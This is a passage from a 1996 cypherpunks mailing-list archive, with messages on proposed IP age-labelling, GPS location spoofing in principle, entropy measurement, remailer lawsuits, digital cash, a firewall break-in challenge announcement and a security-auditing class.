having to read them all, or from the Library of Congress Online Edition if
the Librarian
labels each packet correctly.)  On the other hand, UDP packet exchange,
which doesn't
use sessions, would require validating the user's ID and authorization on
each packet.

Furthermore, if the censorship information is carried at the transport level,
or at a higher level (i.e. headers in the message itself), the only way the
ISP's routers, which work at the IP level, can censor packets is to perform the
equivalent of the Post Office steaming open envelopes before delivering them
to your house, and refusing to deliver them if there's a child living in the
house
and the letter either contains a bad word or is written in a language the
Post Office doesn't understand, such as Finnish or Japanese or PGP.
 

At 04:03 PM 4/10/96 -0700, Lucky Green wrote:
>At 9:48 4/10/96, Duncan Frissell wrote:
>>We know that governments would like to impose things like the Simple
>>Tax Transfer Protocol on the Net as well as Is A Person (and Is A Minor)
>>Protocols.
>
>There is one thing about the proposed minor flag addition to IP that I
>don't understand. [No, I am not surprised by this. Mandatory authorization
>to establish a connection and an "Internet Driver License", probably in the
>form or a smart card are coming].
>If my computer creates the IP packet, what is there to prevent me from
>modifying the value of the "Minor/Adult" flag at my leisure?

If you create outgoing packets that are labelled "Minor", and contain
"Restricted to Government-Certified Adults Only, and No Felons or
Foreigners Allowed" material, you can get busted for it.
So you have to either restrict all your outgoing packets to be labelled 
"RtG-C Adults O,aNFoFA", or else make sure all the material you transmit
passes the "Government-Approved-for-Minors, Foreigners, and Victorian
ladies" filter.

On the other hand, if you don't log in to your ISP with a
"government-certified adult,
non-felon, non-foreigner, politically stable, not-a-Commie-or-Jew" id,
it'll block any packets not approved for you.  Any news or web server will also
have refuse to send any "Adult"-labelled material to you if the requests
arrived on a "Kid"-labelled connection - this means that either the server
machine
will have to only carry Kid-approved traffic, or only talk to Adults,
or add an "Adult" label to all outgoing packets whether marked "Kid" or not,
or else it will have to break protocol boundaries by passing IP-layer
information
up to the application.





#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 12 Apr 1996 17:01:35 +0800
To: cypherpunks@toad.com
Subject: Re: Protocols at the Point of a Gun
Message-ID: <199604111939.MAA14767@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>At 9:48 4/10/96, Duncan Frissell wrote:
>[...]
>>We know that governments would like to impose things like the Simple
>>Tax Transfer Protocol on the Net as well as Is A Person (and Is A Minor)
>>Protocols.

There was a recent discussion on a radio talk show that the IRS is now
requiring some large class of taxpayers who submit estimated taxes
to do so electronically.  The host and callers weren't sure of any of the 
details (such as exactly who's covered and whether you can deduct the
computer you had to buy to submit your taxes electronically :-)
but obviously they read Duncan's phrase about Simple Tax Transfer Protocol
and decided to implement it real fast....
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@isdn.net>
Date: Fri, 12 Apr 1996 12:34:17 +0800
To: tomw@netscape.com
Subject: Re: Bank information protected by 40-bit encryption....
Message-ID: <199604111747.MAA04181@rex.isdn.net>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

With this thread and a prior one about what makes up a challenge 
worthwile, I could not resist forwarding this to the list.  Sorry to 
those that this might offend or be in violation of local NOISE 
ordinances.  Ah, what the fuck.

- -------- clipped from some other mail ---------
Subject: Network Engineering Technologies Announces $10,000 Firewall 
Challenge

Excerpt from: -(BUSINESS WIRE) via Individual Inc.
               [04-08-96 at 15:41 EDT, Business Wire]

[snip]

The Challenge

To claim the $10,000 in NET's Firewall Challenge, individuals must 
first
register with NET, then use a computer to break into NET's secure
transaction server and retrieve information stored there about paper
currency totaling $10,000, namely: (1) the number of notes, (2) the
denomination of each note and (3) the serial number of each note.
The first person to supply the correct information to NET between
12:01 a.m. May 1 and 12:01 a.m. May 31 will win the $10,000.

In the case of multiple break-ins, the first person sending the
correct information to NET's e-mail address will be declared the
winner. Participants must be individuals over 18 years of age, not
companies, and must also agree to surrender to NET all relevant
information about the methods they used to break through the firewall.

Further details on the Network Engineering Technologies' $10,000
Firewall Challenge available on the World-Wide Web at 
http://thefirewall.com
or by writing NET at 1714 Ringwood Ave., San Jose, CA 95131.

[snip]


Lou Zirko                                (615)851-1057
Zystems                                lzirko@isdn.net
"We're all bozos on this bus" - Nick Danger, Third Eye
PGP Fingerprint =  96 F2 E2 32 90 4B 8C 2A  D1 0B 2A 51 3A 3B D8 6F
Public Key available on bal keyserver at MIT


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMW1Fod9BId/c612VAQHKWQP/eKwW1FnuFCTWiZTvOL7r/5VFwLXyrxYF
B9pQnk5LjdjX/2rQZN1h1I9/1iMwkwhCrk5/vZeeqG0DNmmFwDbtrHkVTTo3Cvb5
vXh6PVlmcJjln8S8Tv4XAURDsneImm9lY5O0XX8jS+vov7MP5Wp4hpbdfxe1xuZr
IlCiBVVoamE=
=Phel
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Fri, 12 Apr 1996 18:43:30 +0800
To: JonWienke@aol.com
Subject: Re: Message not deliverable
In-Reply-To: <960410164932_268662594@emout10.mail.aol.com>
Message-ID: <Pine.BSF.3.91.960411123135.13200A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> >Subj:	Message not deliverable
> >Date:	96-04-10 11:51:09 EDT
> >From:	Administrator_at_DCACINTS@dca.com (Administrator)
> [body text deleted]
> Has anyone else been getting these when they post to cpunks?  I get one every

Yep, I've been getting 'em. There's one in my inbox right now. :(

> time I post.  I emailed the administrator at dca.com, a few weeks ago, but
> nothing has changed.  Anyone got suggestions?

I dunno.... Maybe it's some weird mail system at dca.com... Looking at the
full header of the "not deliverable" message I got, it looks like
smtphost.dca.com is using SMTPLINK V2.11 PreRelease 4. I've never heard of
that program, but I would guess (stab in the dark) that that PreRelease
version sees the To:cypherpunks@toad.com and can't find any user named
"cypherpunks" on their system, and so it bounces. That's just a stab in
the dark, though... I don't know anything about that mailer beyond the
fact that it's bouncing these messages around. 


Sig file decloaking...

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| Alternate email: sreid@edmbbs.iceonline.com  sreid@sea-to-sky.net |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|             --- DISCLAIMER: JMHO, YMMV, IANAL. ---                |
=====================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Fri, 12 Apr 1996 21:24:51 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Anonymous Remailer threat: Scientologists may subpoena   anonymous remailer records?
In-Reply-To: <ad91b30d0902100413eb@[205.199.118.202]>
Message-ID: <Pine.SUN.3.92.960411124812.25002A-100000@julie.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 10 Apr 1996, Timothy C. May wrote:

> At 7:37 PM 4/10/96, Jim Byrd wrote:
>
> >The story is weirder than that.  The first poster of church secrets (with
> >lots of commentary) was Dennis Erlich, an ex-scientologist.  Dennis was
> >raided and sued, and is awaiting trial.  His ISP, Tom Klemesrud, refused
>
> His ISP was Netcom. Klemesrud respresents Netcom.
[snip]

Tom does not work for Netcom or represent them, AFAIK.

He is the sysop of the BBS (support.com) that Dennis uses to access the
Net.  The BBS gets its net feed through Netcom.

CoS sued both Tom and Netcom (in addition to Dennis).  They claimed that
after alerting Tom and Netcom to Dennis' alleged "copyright terrorism"
the ISPs should have cut off his net access.  Tom refused, and Netcom
didn't want to pull the plug on his whole BBS just to stop one man accused
of copyright infringement.

I hope I have that all straight...

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 12 Apr 1996 18:16:32 +0800
To: cypherpunks@toad.com
Subject: Possible problems caused by Brown death?
Message-ID: <01I3EZYEN04G8Y4ZSN@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Given that Commerce is the main force within the administration
pushing for freeing up the escrow rules, the below article is of interest.
	-Allen

>   WASHINGTON (Apr 8, 1996 10:48 a.m. EDT) -- When Ron Brown died in a
>   plane crash, American capitalism lost its staunchest ally in the
>   Clinton administration. Now business executives wonder who will
>   champion their cause the next time commercial interests clash with
>   other priorities.
   
[...]

>   With the Cold War over, Brown believed the United States no longer
>   should sacrifice economic interests to other foreign policy goals and
>   he used his close friendship with Clinton to push a business agenda
>   inside the administration.
   
[...]

>   He succeeded in battles with the Defense Department in loosening Cold
>   War-era export controls that American companies had long complained
>   severely limited their ability to sell high-technology products such
>   as computers and telecommunications equipment.
   
>   Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 12 Apr 1996 23:09:19 +0800
To: cypherpunks@toad.com
Subject: Idea Futures - current application
Message-ID: <01I3F04QVGUS8Y4ZSN@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Of course, a form using anonymnity would be preferable. I find it
very interesting that the Commodity Futures Trading Comission is allowing
this; it increases my opinion of them. If someone would forward this to the
extropy list, the idea futures folks on there would find it interesting.
	-Allen


   Reuters New Media

   _ Monday April 1 2:32 PM EST _
   
U.S. Traders Play Political Futures In Cyberspace

   
   
   CHICAGO - As primaries in the American Midwest confirmed Senate
   Majority Leader Bob Dole's clean sweep, a Wall Street trader logged
   into the Internet on his home computer and made one last trade before
   going to bed.
   
[....]
   
   These political futures contracts are not available at the huge,
   traditional exchanges that trade billions of dollars per day. Instead,
   the contracts are on the 24-hour Iowa Electronic Markets (IEM), which
   trades several thousand dollars per day.
   
   The IEM, setup in 1988 by the University of Iowa, is a not-for-profit
   political futures market open to traders globally via the Internet,
   under the regulatory scope of the Commodity Futures Trading
   Commission.
   
   An estimated 5,800 people have registered as IEM members by sending
   checks or money orders to open trading accounts of $5 up to $500 to
   trade various world political markets that also include Austria's
   Vienna City Parliament Election and Canada's British Columbia
   Provincial Elections.
   
   Collectively, accounts total about $150,000, said Joyce Berg, a
   professor of accounting and director of markets at the University of
   Iowa.

[...]

   In that race, IEM payoffs are determined by the candidate who wins the
   majority of popular votes. Contracts in the candidate receiving the
   largest number of popular votes will pay $1 each while all other
   contracts will expire worthless.
   
   &quot;For those of you with Web access, let me point you to an
   astounding place for us market geeks -- the Iowa Electronic
   Market,&quot; one trader wrote in the Option Fool newsletter, written
   and distributed via the Internet.
   
   &quot;It's a fun market,&quot; said Gary Sparks a stock options trader
   at Group One Trading who participated in the market during the last
   presidential election four years ago.
   
   But some take the IEM seriously because each candidate's contract
   price in cents can be translated into his percentage chance of
   winning.
   
   And in the past two U.S. presidential races, the IEM has predicted the
   winner with an average 0.2-percent absolute margin for error. That
   compares to the next most accurate Harris poll with a 1.2 percent
   margin of error, according to the Iowa Political Market's data.
   
   That type of accuracy has caught the eyes of at least a few U.S. stock
   options traders and has earned a weekly spot in a New York Post
   newspaper roundup of presidential polls.
   
   Jeff Yass of Susquehanna Investment Group said he considers what IEM
   markets are showing when making trading decisions in stocks and
   options. &quot;Clinton and Dole have been in a tighter race (on the
   IEM) than any of the Wall Street analysts have predicted,&quot; he
   noted.

[...]

Copyright 1996 Reuters Ltd.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 13 Apr 1996 01:17:57 +0800
To: cypherpunks@toad.com
Subject: Lotus notes 24 bit hack project?
Message-ID: <199604112014.NAA16020@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



reading notes on the recent RSA conference reminds me of something.

Lotus announced their 64 bit encryption for foreign users some 
months ago, with 24 bits secretly "owned" by the NSA. there
was some speculation here about how this was handled. could
the system be so insecure as to have a unique 24 bits used
across every foreign key? or are those 24 bits somehow
algorithmically determined from the other 40 bits, with
the algorithm a secret?

in any case it seems that reverse engineering of Lotus Notes
would provide the answer, and we'd be able to embarrass both
NSA and Lotus (who imho deserves it, for caving in to the NSA)
all in the same sweep by revealing it to the world!!!

I would bet this would be worth some more NYT or WSJ almost-front-page
ink for some lucky cpunks if someone can pull this off!!

this would be a *major* new feather  in the cpunk cap, and I'd
enthusiastically support anyone attempting to work on this project
(maybe writing HTML pages for information or something).

cypherpunks, start your disassemblers!!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eli+@GS160.SP.CS.CMU.EDU
Date: Fri, 12 Apr 1996 22:22:32 +0800
To: cypherpunks@toad.com
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <+cmu.andrew.internet.cypherpunks+4lOmu2e00UfA41010Z@andrew.cmu.edu>
Message-ID: <199604111718.KAA29564@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


JonWienke@aol.com writes:
>I have no disagreements with this.  I merely proposed using the compression
>function as a means of roughly estimating entropy and preventing the seeding
>of the hash/PRNG with potentially "weak key" type data.

It's not a useful estimate of entropy, and I don't see what you mean
by "`weak key' type data".  There are no keys or PRNGs involved here,
just a hash function.  Now, if you've got a sufficiently compressible
data stream, compression may be a fast way to jump-start the
distillation, but you absolutely need a priori information on the
entropy of the source.

>Would anyone like to propose a means of measuring entropy that we can all
>agree on?

If your definition of entropy is at least as strong as Kolmogorov
complexity, it's infeasible to compute.  The way to measure entropy is
to spend ten years trying to understand the data source, and hope that
no one else can afford to spend twenty.

--
   Eli Brandt
   eli+@cs.cmu.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Date: Fri, 12 Apr 1996 11:36:17 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <9604112026.AA8065@>
MIME-Version: 1.0
Content-Type: text/plain


>From: hfinney @ shell.portal.com (Hal) @ UGATE    
>Peter - didn't they say that the checking station is also listening
>to the satellites?  That way they can tell that you are playing back
>signals that you taped earlier because they won't match what the
>satellites are broadcasting right now.
>
>I think your idea would work if you wanted to pretend to be at a point
>which was _farther_ from each of the satellites than where you actually
>are.  Then you could delay all of the signals.  But the only way to
>be farther would be to be deep underground.  You might be able to pretend
>to be at the center of the earth, but that is not very useful.

No, the situation is better than that.

Here's how GPS works (loosely): you have four unknowns (not three):
x, y, z, and the current time.  You have signals from four satellites
reporting their x, y, z, t.  Using suitable math you construct four equations
in four unknowns, and presto, you get your four answers.

Why is time one of the unknowns?  Because your receiver only has
a rough idea of what time it is.  Remember that a microsecond offset
amounts to a 300 meter (1000 foot) displacement.  So a side effect of
GPS position measurement is accurate time measurement.  (Some
GPS receivers turn this around, and make delivering accurate time
their primary task.  They get accurate position as a side effect.)

Suppose I want to pretend that I am 1000 feet closer to satellite 4 than 
I really am.  Simple, I take the signals from all the other satellites
and delay them by 1 microsecond.  That looks like a 1 microsecond
local timebase error together with a 1 microsecond delay reduction
to satellite 4.

Yes, the checking station in this purported scheme would also listen
to the satellites.  That doesn't help at all.  It could detect that I replayed
a signal from a minute ago (unless I substitute the correct time codes,
which wouldn't be hard since they are predictable).  But there is no
need to do that and indeed it's probably easier not to.    In the description
of the article, the "signature" [sic] is sent to the checker over some
sort of comm link, which has a latency likely to be several milliseconds
or more, plus jitter of many microseconds.  If I'm a healthy distance
away from the target (say, 20 miles) that means I have to introduce an
offset of at most 100 microseconds.  If I do that in real time -- which is
no big deal -- then the checker basically has to be capable of
detecting 100 microsecond delays in the authentication data it is
getting.  And if I'm willing to be closer to the lion's den -- say, a block
or two away -- then I only need at most a one microsecond delay.

Incidentally, differential GPS is not an issue (re Peter's question).
GPS relies on knowing accurately the position and time at each 
satellite and the speed of light in between.  DGPS lets you correct
for errors in these.  The idea is simple: if you're close to a "reference
station", then the errors are essentially the same for both.  The
reference station is at a precisely known place, so it can look at where
the satellites claim it is, and deduce from that how much error there is
on the signal from each satellite.  It tells you, and you subtract out those
errors.  So while DGPS lets you get better accuracy, it doesn't
interfere with your ability to fool the CyberLocator scheme.

 paul

!-----------------------------------------------------------------------
! Paul Koning, NI1D, C-24183
! 3Com Corporation, 1-3A, 118 Turnpike Road, Southborough MA 01772 USA
! phone: +1 508 229 1695, fax: +1 508 490 5873
! email: paul_koning@isd.3com.com  or  paul_koning@3mail.3com.com
! Pgp:   27 81 A9 73 A6 0B B3 BE 18 A3 BF DD 1A 59 51 75
!-----------------------------------------------------------------------
! "Be wary of strong drink.  It can make you shoot at tax collectors
!  -- and miss!"
!                -- Robert A. Heinlein, "The Notebooks of Lazarus Long"
!                   in "Time Enough for Love"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 13 Apr 1996 06:53:58 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Digital Cash Escrow
In-Reply-To: <ad91bd700a02100484a7@[205.199.118.202]>
Message-ID: <199604112027.NAA17193@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM:
>
>At 10:14 PM 4/10/96, Bill Stewart wrote:
>
>>Of course, if you happen to become dead while you're storing it,
>>the paper cash is far more useful to your heirs, so I assume we'll have
>>a government-sponsored cash-escrow system announced soon to protect
>>the government's interest in collection of inheritance taxes...
>
>Don't give them ideas, Bill! They are known to monitor our list for
>insights into what to regulate next, and I can see the 15-watt lightbulbs
>going on over their heads as they ponder the wonderful opportunities
>presented by "digital cash escrow."

give me a break!!! the future government attempts to squelch, 
suppress, restrict, prohibit, regulate, tax, spindle, and 
mutilate Digital Cash will make Clipper look as significant and
threatening as a christmas tree ornament.

we have not seen the tiniest shred of the panic and paranoia
that will resonate through government once they get a clue about
what Digital Cash means to the future of the world.

furthermore, it is my belief that there are some very rich people
that effectively control our governments, who have strangleholds 
on various aspects of the world economy that will become a 
tad upset as well.

as I wrote in an earlier essay, the possibilities of combining 
digital cash with stock market company shares suggest a radical
new economy that would have the potential to topple a lot of 
very powerful existing interests, in the way that printing presses
once toppled the Church.

to borrow a bit of Chinese black humor, "we live in interesting times".
we will be living in even more interesting times shortly.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 12 Apr 1996 07:48:03 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Know Your Net.Enemies Project
In-Reply-To: <ad928bf30d021004097c@[205.199.118.202]>
Message-ID: <olPI84q00YUuIE=vI9@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from cypherpunks: 11-Apr-96 Re: Know Your Net.Enemies P.. by
Timothy C. May@got.net 
> Sort of like Nixon's Enemies List?
>  
> Have we become the enemy?

Tim, I thought that the "Enemies List" name would be seen as a
deliberate takeoff of Nixon's Enemies List, and what I thought would be
a humorous working title for the project until a permanent one was
found. You may remember, BTW, that I don't have the power of the FBI to
command.

But since I was unclear and since the joke was ill-taken, I apologize.

To be clear: I envision this as opposition research. In the context of
the CDA, it was very useful to know what the family values groups were
saying -- their arguments and their strategies. A central collection
point for such research is a useful thing.

Suggestions for a working title, anyone?

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 12 Apr 1996 15:39:24 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: security auditing class (fwd)
Message-ID: <199604111833.NAA03453@homeport.org>
MIME-Version: 1.0
Content-Type: text


Wow.  Looks like fun.

----- Forwarded message from Dan -----

>From firewalls-owner@GreatCircle.COM  Thu Apr 11 06:54:33 1996
Message-Id: <199604102045.NAA29570@flying.fish.com>
X-Authentication-Warning: flying.fish.com: Host zen@localhost didn't use HELO protocol
To: firewalls@GreatCircle.COM
Subject: security auditing class
reply-to: /dev/null@flying.fish.com
Date: Wed, 10 Apr 96 13:45:46 -0700
From: Dan <zen@flying.fish.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk




Announcement of Free Class on Internet Security Auditing and Risk Assessment

                     *** Sponsored by Sun ***


TIME & LOCATION

  Tuesday, April 30th, 1996
  ***** This class will be given *one* time; it will *not* be repeated *****
  The class will last all day - 8 or more hours

  [Exact building/location TBA, but will be in Mountain View, CA, USA


INSTRUCTORS

  Dan Farmer                      Wietse Venema
  Sun Microsystems                Eindhoven University of Technology


GENERAL OVERVIEW

***                       WARNING                                          ***
***  This class will be aimed at experienced system administrators or      ***
***  security auditing professionals.  8 hours of class in one day is not  ***
***  for the faint of heart!  However, there are no requirements or        ***
***  prerequisites needed to attend.                                       ***
***                                                                        ***

Wietse and I are going to give a class on security auditing.  In
something like 8 hours, we are going to try and cover everything we know
(or at least the highlights) on how to do an Internet security audit.
Neither of us have any formal auditing training, but we feel that with our
combined experience (we are the authors of the TCP wrappers, COPS, and
SATAN, among other tools and papers) that we have a fair amount to say
about the subject.  If the class goes well, we plan on giving another
talk in the summer, probably in europe next time, on securing your Unix
system.


CLASS TOPICS (selected, not exhaustive)

Definition and purpose of security auditing
Software and hardware tools used
Our general philosophy about auditing
Tiger teams
Types of auditing/systems
What to examine/ignore
"Perfect" vs. incomplete data
Micro vs. macro auditing
Auditing large networks
Passive vs. active data collection
Interpretation of data collection
Auditing the security policy
*Our* auditing and security standards
Scoring methods
Overall data analysis
System design analysis
The report


REGISTRATION NOTES & INFORMATION

   We don't know how many people will show up; we will try to accomodate
   everyone, but with finite space, we might have to limit the class size.
   It will be filled in a more-or-less first come, first serve basis.

   We will be placing some notes on the web; registered participants will
   be notified of where to find them.


To register, you must send a *physical* letter with your name and e-mail
address to my wonderful Sun administrator:

   Diana Behjou
   2550 Garcia Avenue, MS PAL01-550
   Mountain View, CA  94043-1100
   USA

And request a position in the Internet Security Auditing and Risk
Assessment class.  You will receive an e-mail reply to confirm your
registration.  Again, there is no charge, but *please* don't register
unless you are certain that you'll be there, because others will suffer
if the class fills up.

E-mail will probably be ignored, unless I know you, and then I'll be
pissed off that you asked me to add you to the list instead of sending a
stupid letter, and you'll owe me a bottle of fine port or something.
There is no ulterior motive to this, other than the fact that wietse and
I are trying to write a book, and we're using this as a motivational
tool.

Enjoy.

----- End of forwarded message from Dan -----

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas C. Allard" <m1tca00@FRB.GOV>
Date: Fri, 12 Apr 1996 14:03:14 +0800
To: cypherpunks@toad.com
Subject: Re: questions about bits and bytes
In-Reply-To: <9604111803.AA6921@>
Message-ID: <9604111736.AA18301@bksmp2.FRB.GOV>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 12 Apr 1996 07:58:35 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <199604111714.NAA02244@universe.digex.net>
Message-ID: <199604111740.NAA21264@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
> Anyway, you computer creates the IP packet, but then sends it to your
> ISP's router.  That router *always* makes changes to the packet header
> because it must decrement the time-to-live field and recompute the
> header checksum.

There is a trivial trick for making the decrement TTL/change checksum
operation very fast, based on noting how a decrement would change the
checksum. Most very high speed routers attempt to avoid doing ANY
processing of the packets at all beyond this, and IPv6 has no header
checksum partially in order to reduce this overhead further. Forcing
routers to do more work is a Very Very Bad Idea.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 14 Apr 1996 01:08:01 +0800
To: perry@piermont.com
Subject: Re: Money supply is fake anyway
In-Reply-To: <199604111444.KAA20811@jekyll.piermont.com>
Message-ID: <199604112040.NAA18876@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



PM:
>Thomas Grant Edwards writes:
>> Banks "invent" money on a daily basis.
>
>Really? Since when?

since we left standards that tie money to things physical with
value. i.e.-- the federal reserve was created, supposedly moving
to a gold standard, but which was given up, and then we moved
to silver, which was then thrown away by Nixon or whoever.

TGE was obviously referring to the way that all banks are authorized to
lend money that they don't actually have in assets based on our
banking system. they are all "tentacles" of the federal reserve,
so to speak. <g>

people say, "so what if we don't use gold. money is just an abstraction".
perhaps so, but think of this: if an economy collapsed such that
money no longer had any psychological value, would you like to go to your 
bank and have them say, "sorry, we don't guarantee our money"? or would
you like to go pick up your few pounds of gold or whatever that the
money represented? I can guarantee you this: the latter scenario is
not possible in our current system, and if you think it is, perhaps
you will encounter a reality check (like the crash of '29 was).

a long time ago a "banknote" referred to gold, and that banknote could
be traded for that gold. manipulations in our system caused us to lose
that standard. few people will understand this, and those that control
the money supply and benefit therefrom would prefer it that way.

the power of printing and creating money is far more significant than
most people understand. again, those that do understand it would
prefer that it stays this way.

a somewhat amusing book called "Last Waltz of the Tyrants" might
interest some. there are many more substantial books on the subject
as well. 

these issues are going to come to the forefront if digital money
ever gets off the ground. again, I expect that there are a lot
of people secretly working against digital money because it has
the potential to interfere with monomaniacal power structures already
in place.

sure, I'll be flamed by some for writing this, but what is the
cpunk list without a little delicious conspiracy theory?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan B. Clegg" <abc@gateway.com>
Date: Fri, 12 Apr 1996 10:00:59 +0800
To: unix-lizards@gateway.com
Subject: machine moved, mailing lists intact.
Message-ID: <Pine.BSI.3.91.960411134631.364D-100000@black-ice.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


Update:  cypherpunks-d, bsdi-users(-d), unix-lizards.

The system running the mailing lists has now been physically moved from
one place to another (phew, didn't drop it!), and all seems to be OK.  A
couple of DNS changes still remain to be made, but things seem to be
working pretty well. 

I will be moving a couple of things around and updating some systems OS 
soon, so we're not all done yet... 

Please let me know if you see any additional oddities.  

Just for the record: ISDN really IS cool.  I just can't wait to get that 
other B channel running.. yowza.. 128k to the house!

-abc
                                      \             Alan B. Clegg
         Just because I can            \         Network Technologist
        does not mean I will.           \          gateway.com, inc.
                                         \     <http://www.gateway.com/>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael C. Peponis" <mianigand@[205.164.13.10]>
Date: Fri, 12 Apr 1996 12:58:10 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: I have seen the enemy, and it is us (was Know Your Net.Enemies)
Message-ID: <199604111831.OAA17305@Fe3.rust.net>
MIME-Version: 1.0
Content-Type: text/plain


On 10 Apr 96 ,Declan B. McCullagh wrote:

> Would anyone be interested in collaborating on a "Know Your Net Enemies"
> project?
> 
> We'd start with a resource like Bob Chatelle's excellent web pages at
> <http://world.std.com/~kip/bcfenatl.html> and with permission build on
> it and list the deceptions and misrepresentations each Net-Enemy has
> engaged in -- what each has done to restrict liberty online. We'd
> include original documents and links as appropriate.
> 
> Who would be listed? Well, there's the family values groups
> [AFA/CC/NLC/EE!/FOF/FRC], the green card spammers, Carnegie Mellon
> University, Marty Rimm, the Church of Scientology, the Simon Wiesenthal
> Center, the NSA, German state prosecutors, Senator Exon, Dorothy
> Denning, and so on.

> Anyone interested? This would be a great resource.

Sure, it's worth a shot, but what is the ultimate goal???

I have noticed that there has been alot of noise about who is doing 
what, but instead of whining and crying, what are we going to do 
about it????

Cryptology lets people put an envelope on their communications, which 
is a significant achievment.  Digital signatures allow for 
authentication, another acheivement, but what else could be coded?

Sure, it is technicaly possible to set up net sites whos physical 
location could not be determined without alot of effort, but at that 
point, the war has already been lost, that practice is just 
minimizing the extent of the loss.

Seems all the end result is just rialing up everybody, and repeting 
ad nausum how stupid these people are, like we didn't know that 
before.

These are not technical problems, they can not be coded out of 
existance.  The problem is with people, and must be delt with at that 
level.

Legislation and debate will not do a damm thing, we have our views, 
others have thiers, and the two will never meet.  Personally, I don't 
even respect the family groups, national security types, etc, thus I 
really do not care about thier concerns or feelings, nor do they care 
for mine.

At some point and time, people are going to decide for themselves 
what is their freedom worth.  Are they willing to give up all the 
benifits of a parential govement taking care of them so that they can 
be truely free.

I would say no, even most people here are all for freedom, as long as 
it does not cost them anything.

They are all for freedom as long as they don't have to live in fear 
for their life because absolute freedom means that everybody can do 
whatever they want, and some people have no problem blowing you away 
for the stupidest reasons.

Such is human nature, alot of people are not very nice, sorry, that 
is the way it is.

The other one was "We need a stable enviorment to continue generating 
captital so we can afford to by new toys"

Again, we have a choice, give up our freedom for the toys, or give up 
the toys to be free.

As has been said many times before FREEDOM ISN'T FREE.
Regards,
Michael C. Peponis
Public Key Avalible Via Key Servers, or Finger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blane@aa.net (Brian C. Lane)
Date: Fri, 12 Apr 1996 06:04:51 +0800
To: cypherpunks@toad.com
Subject: Re: WWW User authentication
In-Reply-To: <199604091558.LAA22026@jafar.sware.com>
Message-ID: <316c8b7a.17970650@mail.aa.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Apr 1996 11:58:34 -0400 (EDT), you wrote:

